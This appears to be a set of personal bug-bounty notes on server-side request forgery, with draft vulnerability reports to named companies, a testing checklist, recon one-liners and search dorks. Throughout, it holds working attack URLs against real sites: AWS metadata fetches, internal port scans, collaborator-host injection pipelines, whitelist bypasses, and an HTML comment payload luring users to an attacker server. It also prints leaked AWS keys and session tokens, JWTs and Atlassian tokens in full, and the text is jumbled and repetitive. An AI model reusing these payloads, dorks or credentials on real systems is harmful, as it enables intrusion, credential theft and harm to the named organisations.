0% found this document useful (0 votes)

216 views23 pages

Ssrffinal

An internal server-side request forgery (SSRF) vulnerability was found in the subdomain images.shopper.ipsy.com that could allow port scanning and disclosure of internal AWS metadata. The vulnerability stems from the ability to append arbitrary URLs to the endpoint, including internal localhost addresses. This enables an attacker to scan internal ports and retrieve credentials by making requests to the AWS metadata URL. The report provides details on reproducing the port scanning and a proof of concept using Burp Collaborator to verify the internal SSRF.

Uploaded by

Aneesh D

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

216 views23 pages

Ssrffinal

Uploaded by

Aneesh D

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 23

SSRF

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://
farm1.staticflickr.com@615pcsnienat67065o6uulidm4swgl.burpcollaborator.net/
175/455279239_720dfc98c8.jpg

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:

1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080,22,21,25 and see the response

80
image.png
image.png

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:

https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-
data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" :
"IQoJb3JpZ2luX2VjEMH//////////wEaCXVzLWVhc3QtMSJHMEUCIQDngpLHpcc0SUbQRcvq1+YWoIkIgx
ub2xYC2XLjbjpMAgIgIxoyoPHR+D9+h+dZqDbh5VmfP0BhOZpsA040nDcOSpkqgwQI6v//////////
ARADGgwwNzcxODkzMjgzMDMiDMXFebMKEq8i7UrFnCrXAw2EI4Uq6KcUeSJ/
6hx+TdeALNPSp+rUZGEZxSXEVcgDbeUbaitQpQiD+0IlzlMfCdyKEx2EVLy6boKMNZp8WUqiNQ9l6m7WQwh
JQZpNoIq9R0Z8xbLPb1nqekNsw0g/8M91+4E7padeMeluSaY8eRPB0kHYoV3dX6Q7hmwPr65EA3/
PSiyr847ALsmgFiCWe5x2pUwp7J9ACKH1S9an4Ins8XUtCboGdKS1IOjSPcL1cQdkoanBv/
g74jHYEyLZO9vQ3PKMvDTpGTlsCkIk0gIofPrYjuUs7bWhMkZK4hfkdiv3/
q5fqN+K6B2CXMkIf6guHuxcmAYn+ro9dGYrkbmxUBIEVvSmfZbmQJ6xJpiletRxQC+EMcI/7ykrQ/
X9MU+4I2AzmA9nOqURJH5F+8BK96etpf4aLYn2FviolQ7JrzLAEnJyawAjbfZ2v0azQOEYeJ8AP9h6akGQT
mwDIp4Yaj6YYqyZQfOkVW8yLSH06gWPcT/7BUAnTWvAQpMSa5S4NEexgF2kZZS9FpPzFHvrRE/
SeVENP+JsmJBbQpVAFpN4gBwYPm2sll35ckyuvcddJ5WpbOK61jwRkYzvwTU2HLeRh9j2ec9qjTUt4DihE3
8d0++TojCHgNSPBjqlAZ7W3iRIZvN6MXnYgHwSkJa8Cq6IZRHT2N1AhKilXRu8F/
i+AKtJc3WX3V8QoccFV4BTavfcSWUPOIAyJFgWfAhFLziVixWh4egkUu4mox6fx32Ggbi3BVTQoww7oODkW
tdIX4U4hjwDPJj2Kah7q93Wi0I492t7gK2ymakQtvpgAT4f2kpflSshtRbrxqN7yIgrpoL0iaIs3h6P6Emd
Wc9QZayKUw==",
"Expiration" : "2022-01-29T15:02:44Z"
}

Hello knaw team,

I aditya found security issue in your system where SSRF is leading to port scan

Title: Internal SSRF to scan ports and force to make HTTP request

Steps:
1. Open URL https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
On port 8080 its giving instant response
2.https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:80/jp2/14759615811661.jp2
Its giving slow response or taking time to response
3. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
Changed localhost to 127.0.0.1 , 0.0.0.0 , [::]
4. Capture URL in burp suite > Send to intruder
5. Add port position as attacking position "8080"
6. Go to payloads > numbers > from 1 to 10000 | step 1 = Start attack
7. Observe the response where port 8080 is giving 200 OK and remaining are giving
404 etc
Impact:
As an attacker I am able to perform port scan internally , localhost payloads
working (Blacklist payload) . Able to induce server to make HTTP request on
different ports like 8080,443,80(DNS)
POC:

image.png

502
503

SSRF automation

subfinder -d target.com | httpx | tee subs.txt | sleep 3600; | cat subs.txt |

cat data.txt | grep "=" | qsreplace

"hj4w5jlbpl95sx2i9wmip1o9r0xrlg.burpcollaborator.net" | tee ssrf.txt; ffuf -c -w
ssrf.txt -u FUZZ

Keywords for SSRF

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Payload crafting

1. subs valid
2. getting wayback urls | valid urls
3. cat waybackurls | gf

cat wayback | gf ssrf | tee ssrftest.txt

cat ssrftest.txt | grep "=" | qsreplace

"https://3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net" | tee ssrf.txt

cat ssrf.txt | httpx -sc

https://clickjacker.io/?refer=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://clickjacker.io/test?url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net
https://www.clickjacker.io/test?
url=3kojard9zjcg42auxw0eq1ify64wsl.burpcollaborator.net

BB-TIP

echo minddesign.co.uk | gau | tee test

GF Installation

1. go get -u github.com/tomnomnom/gf
2. echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.bash' >>
~/.bashrc
3. mkdir .gf
4. cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf
5. git clone https://github.com/1ndianl33t/Gf-Patterns

echo 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud | waybackurls | grep "="

| qsreplace "http://169.254.169.254/latest" |

proxy=
page=
img=
red=
url=
APIPA: 169.254.169.254

payload:

http://169.254.169.254/latest
https://169.254.169.254/latest
169.254.169.254/latest

SSRF

1. HTTP req is imp

2. DNS is no use
3. HTTP req , Sometimes its no use - IP yours = no ssrf , IP third party - NA

paypal - aws , gcp

Aditya PC [malicous acitivity] = Aryan PC

attacker.com - target.com

sales.dell.com/api/us/imgurl=https://evil.com/aditya.xml

USE
1. Collaborator
2. Repeater
3. Intruder

1.Detetction

http

EXPLOIT
1. Cross port scan p3
80 HTTP - OPEN
443 HTTP - OPEN
22 Filtered / Closed
21 Mo req - Clsoed
3306 DNS
25 SMTP - OPEN
8000
8443

PASTE URL fucntion is vulnerable for SSRF leads to cross port scan

2. File over port + DOS p4 p1

POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/116.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 140
Referer: https://app.short.io/
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImVlOTU5MzcxLTZmMGQtNDQzZS04OTFhLTJlNj
A1ZTZjMDJiZCIsInVzZXJfaWQiOjEwMjE2NjgsImVtYWlsIjoieWNmZ3ZqaGJrQGdtYWlsLmNvbSIsImxvZ
2luSGlzdG9yeUlkIjoiMTRiMzU1ZGMtZjUzMC00NzI2LTk5NmYtNmRhNDc0ZjZmYmYxIiwiaW1wZXJzb25h
dGUiOmZhbHNlLCJpYXQiOjE2OTEyMzAzNjIsImV4cCI6MTY5MzgyMjM2MiwiaXNzIjoiYXV0aG9yaXplciJ
9.WDd0Nt_WYeNXNg_se82pmMP5GaOkuXBZWf-Knaz6Xow
Connection: close

{"originalURL":"wzzd95ogm3ehqi0na2v3y2olhcn2br.burpcollaborator.net:443/
admin","domain":"arnk.short.gy","source":"website","allowDuplicates":true}

1.1 Clear all position

1.2 url:443/admin - add admin as attack pos
1.3 Go to payloads
1.4 Add from list
1.5. Server side variable names > Start attack

3. Backend system scan p2

4. Whitelist bypass p2 p1
5. AWS metadata retrive P1

Where check

1. POST req
GET request

ADD image
Add link , URL
Add data - bio , name , last name
Headers
Update link

AJdAgnqCST4iPtnUxiGtTz

curl -X POST \
-d url="https://9mwt039uxglj13wwecrd5u8klbr1fq.burpcollaborator.net/aditya.png"
\
"https://www.filestackapi.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

===================================================================================
================================================================================
https://tomcat.tiler01.huygens.knaw.nl/

Where
1. Register Form : 100
2. Feedback Form : 100 GB | 50*50 GB = 50 GB
3. Comments : 100
4. File Upload : 100
5. Contact Us : 50

Impact:
1. Service will down
2. Other legit users cant send feedback
3. Backend Crash
4. Service will slow

TA:
Session : 1
Cookies : 1
Headers : 1
Values : 1
Parameters : 1
Payload :

5MB = 1 Form

As an attacker 20k

20000*5
1000000

100GB

Jsfuck

Payload:

How much Time : 3000 to 5000 time

Status Code :
501
502
503

4 GB = 2GB

GTA 5 65 GB

+++++++++++++++++++++++++++++++

Comment Injection EXT SSRF

Where we can comment = article , post , image , blogs , forums , reply , reviews

Burp Collaborator

Sorry! New URL is: <a

href="https://shorturl.at/dtDEU">https://google.com</a>
Aditya = kongsec.io

Hi team,

Aditya here found insecure function exploitation on app.october.eu

Bug: Business logic vulnerability in invite function leads to victim response

fetching via email of october.eu

While testing I found behavior in invite

function that sends hook mail to
which we put in email section. Whenever we
get email it shows NAME and some data. I used
Burp_Collaborator_Link.net" So I got mail which
was showing link
Burp_Collaborator_Link.net and the link is in
blue part so once who click on It will fetch
response of that person or victim. Main point is
Ifl registers the form with email of victim and
hit send it ill send mail on victim email
address via october address

How it will impact victim ?

Hacker will use email id of victim for invite

process. In every section hacker will use
collaborator link or grabbing link and registered
with victim email address. Victim will receive
mail with link once user interacted with link hacker will
get response in POLL

Business impact:

Normal user will think he got mail from october.eu but as we know function dont
have security to verify invite . So it will harm multiple users on behalf on
october.eu

Bug verified by other company also.

I hope you will patch it soon

sub.samsung.com = IP aws

1. HTTP is important | DNS = no use

2. Not every HTTP is SSRF
3. HTTP IP = if its yours then no SSRF

Always Exploit

market.nokia.com = IP =
SSRF:
External : Third Party service : Aws , gcp ,
Internal : Sys based, IP based , Network based

https://site.com/index/profile?img=https://site.sub.com/image.png

Where
Register Form : Name , Last name
Profile Bio
Headers
Add or insert Link
Check URL
Verify URL

How
1. Burp Collaborator
2. CollaboratorEverywhere

X-Forwarded-For:

Detection

HTTP://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net
HTTPS://1oq5ai06ny6ifimgthixx91wwn2dq2.burpcollaborator.net

Request:
POST /links/website HTTP/1.1
Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/55.0.2883.87 Safari/537.36
[email protected]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 146
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjQ2NDc4YmE2LTI5MDUtNDc2MC1iM2I1LTE5ND
hiMmE2ZGMyZCIsInVzZXJfaWQiOjM1Mzk3NywiZW1haWwiOiJoa2RzYmZoZGJAZ21haWwuY29tIiwibG9na
W5IaXN0b3J5SWQiOiI0YzM2ZGZjMy03NDM4LTQzNDktYjJlMi00Mjk0YWZhYWIyODQiLCJpYXQiOjE2NDI4
NDc3NjIsImV4cCI6MTY0NTQzOTc2MiwiaXNzIjoiYXV0aG9yaXplciJ9.FUUuuEEpd84ydIMg2IBr3AIT-
bippT9yXrG92MgjQeA
Referer: http://dizklt08ztnal2blf8fadgi27tdkblza.burpcollaborator.net/ref
Connection: close
Cache-Control: no-transform
CF-Connecting_IP: spoofed.l9vsc1rgq1eica2t6g6i4o9ay14s2pqe.burpcollaborator.net
Client-IP: spoofed.gcwnfwubtwhdf55o9b9d7jc51w7n5lta.burpcollaborator.net
X-Wap-Profile: http://llaso13g21qioaetigiigolaa1gser2g.burpcollaborator.net/wap.xml
True-Client-IP: spoofed.0pq7sg7v6guxspi8mvmxk3ppegk7i76w.burpcollaborator.net
X-Real-IP: spoofed.hg1ojxycxxlej69pdcdebkg65xbo9qxf.burpcollaborator.net
X-Forwarded-For: spoofed.kj7rm01f00ohm9csgfghenj980ercu0j.burpcollaborator.net
From: [email protected]
Contact: [email protected]
X-Originating-IP: spoofed.lmbsp14g31ripaftjgjihomab1hsgi47.burpcollaborator.net
Forwarded:
for=spoofed.0fg7igxvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;by=spoofed.0fg7ig
xvwgkxip88cvcxa3fp4ga79yxn.burpcollaborator.net;host=spoofed.0fg7igxvwgkxip88cvcxa3
fp4ga79yxn.burpcollaborator.net
X-Client-IP: spoofed.z5568fnumfaw8oy72u2w025ouf06zzno.burpcollaborator.net

{"originalURL":"http://
68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:25","domain":"344r.short.gy","s
ource":"website","allowDuplicates":true}
Exploit
1. Port Scan P3 400 - 950
Open : HTTP
Closed : Nothing/DNS

80
21
22
25
8443
443
8080
3306

34.229.82.105

200 Ports

10 OPEN
190 closed

2. File over port

3. Backend System/machine Scan
4. CDN-CGI exploit
Wayback
5. AWS SSRF exploit
6. SSRF to Dos :
{"originalURL":"http://68cz0df7c4eurht8izyus6gkub02or.burpcollaborator.net:7/
index"} 1000 PORTS 502
7. Whitelist Bypass
65535 = 40535
20000 OPEN
[{"data":{"linkPostPreview":{"status":"PROCESSING","preview":null}}}]

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://farm1.staticflickr.com/177/443368970_2550c05bd5.jpg

WhiteList

#
@
.

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://
farm1.staticflickr.com.e3izhgppp50o5ys99mc7dou4nvtmhb.burpcollaborator.net/
177/443368970_2550c05bd5.jpg

https://
farm1.staticflickr.com.6jqrx85h5xgglq81pesztgaw3n9hx6.burpcollaborator.net/
177/443368970_2550c05bd5.jpg

https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/
rotate=deg:exif/resize=width:210/output=quality:70/compress/https://
process.fs.grailed.com@r2ucgto2oiz14brm8zbkc1thm8s6gv.burpcollaborator.net/
4srXcOuSkGLoFEAQb6Uk

burplink.net::8080 123.45.67.89 nmap IP 8080 443

X-Forwarded-For: http://burplink.net::

burplink.net::[22]:1

8080,22,25,443,3306

{profile_uri:http://burplink.net}

127.0.0.1
0.0.0.0
localhost
127.1/Admin
double encoding URl

http://developer.blackberry.com/devzone/files/burplink.net/design/bb10/
Wireframe_Slides_BB10_3.ppt

Dorks for testing:

https://www.google.com/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=2ahUKEwjktcGvvd3oAhXg4jgGHY
ctAaUQFjAAegQIAxAB&url=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fdex.hu%2Fx.php%3Fid
%3Dtotalcar_magazin_cikklink%26url%3Dhttp%253A%252F%252Fen.wikipedia.org%252Fwiki
%252FUniform_Resource_Identifier&usg=AOvVaw0jWeJNWIgR8eM65PmT9lqa

https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://
169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-
instance

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
latest/meta-data/iam/security-credentials/flaws/

https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F
%2Fgoogle.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?
consumerUri=https%3A%2F%2Fround-lake.dustinice.workers.dev%3A443%2Fhttps%2Fgoogle.com

tesla.com/site/verify?uri=http://[email protected]

http://www.opensource.apple.com/source/files/files-599.15/Library/Documentation/
Acknowledgements.rtf

inurl:"/plugins/servlet/oauth/users/icon-uri?consumerUri="
http://jira.exeliatech.com:8000/plugins/servlet/oauth/users/icon-uri?
consumerUri=http://127.0.0.1

http://i.dell.com/sites/doccontent/shared-content/data-sheets/fr/Documents/http://
127.0.0.1/

/admin/data?id=

inurl:"/admin/data?id=532"

inurl:return =https

inurl:url=http

inurl:u=https

inurl:u=http

inurl:redirect?https

inurl:redirect?http

inurl:redirect=https

inurl:redirect=http

inurl:link=http

127.0.0.1 db url

%23e=octet

site.com/index/user/api?file=https://sub.site.com/abc.pdf

External SSRF
Internal SSRF

Where ?
Register : Name , Last name
Insert URL
Add URL
Verify URL
Paramaters

If IP is yours then its not SSRF

NOT evry HTTP IP is SSRF

Always exploit

Port Scan

If port is open = HTTP request in collaborator

If port is closed = DNS or nothing

AWS Metadata SSRF

Detection : WHOISIP

IP = AWS , GCP , DO etc

Function : Insert URL

SSRF IP = AWS

APIPA range = http://169.254.169.254/latest/meta-data

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:

80
image.png
image.png

URLs

Port Scan

AWS Metadata URL:

EP: jira/projects

Summary: Atlassian token disclosure and crafting nested queries with internal port
scan as SSRF may leads to application level DOS

Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user
[email protected]:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_8ad836cdf79bba5c679a48e0d92f5fbe57b7cb0e_lout

2. I got this token from burpsuite spidering of accredible.atlassian.net

3. Now run this curl -v https://accredible.com:22 --user

admin@accredible .atlassian.net:e682d3ad-26d0-4cc1-8dc4-
91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

We can see the time delay on port change 80,8080 giving instant response but 22
port giving late reponse

Browser/OS: NA/ Firefox

Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might

result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.

When we check command on 80,8080 port it gives speedy response but on port 22 it
gives late response . It means 22 closed. If hacker perform this attack like port
scan then this may leads to DOS

I got token while crawling whole web app or else simple method is that we can check
source code on following endpoint-- https://accredible.atlassian.net/projects

Steps to reproduce issue:

1. Check source code of https://accredible.atlassian.net/projects
2. Search for "atlassian-token"
3. Atlassian token can be used for crafting nested queries but I escalated this to
SSRF port scan
4. Syntax for crafting next queries : curl -v https://mainhost.com --user
[email protected]:atlassian_token_here_lout

Exploit command:
1. On port 80
curl -v https://accredible.com:80 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

It crafted queries and gives us valid response , We can say instant response
image.png

2. On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me response after 1 min 45 seconds :" failed to connect on port 22"
image.png

3. On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
It gave me response which was instant with crafted queries

Command is curl -v https://accredible.com:443 --user

[email protected]:9c0fc891-2e3b-49d4-a94d-
6e2a409d1daf_711d800a83753ef92686d0ed61fd2b8a4cfb41d6_lout

Also I tried same command with port 3306 it takes a long time

Impact: The first part is , It gives instant response on open port and when I try
with closed port like 3306,22 it takes long to craft queries

So If hacker try same attacks on closed ports so the command will force a server to
craft queries because of a closed port it's not going to craft it . Performing same
attack on closed ports to craft queries will make server engage and this may leads
to DOS attack.

curl -v https://accredible.com:80 --user [email protected]:e682d3ad-

26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 22
curl -v https://accredible.com:22 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout

On port 443
curl -v https://accredible.com:443 --user [email protected]:e682d3ad-
26d0-4cc1-8dc4-91d7b1376b57_6f7864e1a43c4347ebd0442227f4808d582792b1_lout
===============================================

Hi team,

I found JQL injection in https://wiki.eveoh.nl

Description
The JQL query in our case limits the data to one project and a specific (and rather
short) time range (the current month). This restriction is hard-coded and should
not change. However, a crafted user value allows us to remove this limitation:
Martin Schneider' OR created < '2021-01-01
Now the query becomes
project = TeamA AND created > startOfMonth() AND assignee = 'Martin Schneider' OR
created < '2021-01-01'
will fetch all tickets from all projects of the entire JIRA instance!

How to reproduce
Go to https:// wiki.eveoh.nl /issues/?jql=
in jql paramter put any heavy load crafted payload
And perform attack multiple times
attack vector is to craft JQL queries with bad performance and thus long runtime. I
didn’t explore this in detail, but it’s easy to imagine that queries using JQL
functions, especially custom ones, can be designed to become quite expensive. JIRA
has some safeguards in place, but this might still open an attack vector to perform
DoS attacks by sending multiple such queries at the same time.

Solution
As a security threat, JQL injection is far from being on the same level as SQL
injection. However, there are ways an attacker can exploit it. It is important to
understand under which circumstances it poses a threat and how to prevent it.
With security, having multiple layers of protection is a fundamental principle. In
my opinion, input sanitisation should always be one of them.

======================

Hi team,

Aditya here found unauthorised access on demo server

URL: https://jira.typo3.com/servicedesk/customer/user/signup

image.png

CVE 2019-14994 based bug hitting your service based applications Vulnerable This
advisory discloses a critical severity security vulnerability. Versions of Jira
Service Desk Server and Data Center are affected by this vulnerability. Customers
who have downloaded and installed affected versions of Jira Service Desk Server and
Data, please upgrade your Jira Service Desk Server and Data Center installations
immediately to fix this vulnerability. By design, Jira Service Desk gives customer
portal users permissions only to raise requests and view issues. This allows users
to interact with the customer portal without having direct access to Jira. These
restrictions can be bypassed by a remote attacker with portal access who exploits a
path traversal vulnerability. Exploitation allows an attacker to view all issues
within all Jira projects contained in the vulnerable instance. This could include
Jira Service Desk projects, Jira Core projects, and Jira Software projects. Impact
Attacker can raise unlimited issues. Note that attackers can grant themselves
access to Jira Service Desk portals that have the 'Anyone can email the service
desk or raise a request in the portal' setting enabled. Changing this setting does
not defend against an attacker that has portal access via other means. Atlassian
does not recommend changing the setting.

=================================================================
Hello team,

Aditya here found bug which is stored external ssrf and able to capture users logs
and IP,s via comment section:

Issue background

External service interaction arises when it is possible to induce an application to

interact with an arbitrary external service, such as a web or mail server. The
ability to trigger arbitrary external service interactions does not constitute a
vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences.

Impact:
The ability to send requests to other systems can allow the vulnerable server to be
used as an attack proxy. By submitting suitable payloads, an attacker can cause the
application server to attack other systems that it can interact with. This may
include public third-party systems, internal systems within the same organization,
or services available on the local loopback adapter of the application server
itself. Depending on the network architecture, this may expose highly vulnerable
internal services that are not otherwise accessible to external attackers. The
facility to generate an email to an arbitrary address is often intended application
behavior. But this is not necessarily the case, particulary in cases where the
destination address is not explicitly entered on-screen by the user.

Steps:

How hacker will exploit this

Go to https://communities.bentley.com/communities/other_communities/sign-
in_assistance_and_web_services/f/cloud-and-web-services-forum/4547/bentley-
download?tempkey=2199dab4-d0ba-4965-a445-0ac853b8d278

Reply to any post and in payload add this as source

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="5;url=https://www.google.com">
</head>
<body>
Sorry! We have moved! The new URL is: <a
href="https://www.hacker_server.com">https://www.google.com</a>
You will be redirected to the new address in five seconds.
If you see this message for more than 5 seconds, please click on the link above!

</body>
</html>

Once user click on google.com , the ip and logs will interact via bentley server to
hacker server.

Sorry! We have moved! The new URL is: <a

href="https://www.hacker_server.com">https://www.google.com</a>
You will be redirected to the new address in five seconds.
If you see this message for more than 5 seconds, please click on the link above!

SSRF
Server Side Request Forgery

IMP:

1. Do exploit then report

2. if DNS then no use
3. Write each step

Detection SSRF : HTTP

1. Burp Collaborator
2. Ext: Collaborator everywhere

Exploits:
1. Port scanning
2. File over a port
3. Backend system scan/machine
4. SSRF to DoS
5. SSRF information disclosure
6. SSRF to aws metadata
7. SSRF to random escaltion
8. Whitelist/Blacklist SSRF bypass

Tool: Waybackurls

Burp

Where ?

Headers
Add link
upload photo
insert URL
add website to bio
convert files

SSRF ?

https://target.com/user/profile?imageurl=https://burplink.net

https://clickjacker.io
https://document.online-convert.com/convert/docx-to-pdf

site.com/admin/ep/img?file=https://test.com/admin.png

IMP : Images : png . jpeg . jpg

look for : cdn-cgi

.
#
@

https://web.archive.org/cdx/search/cdx?
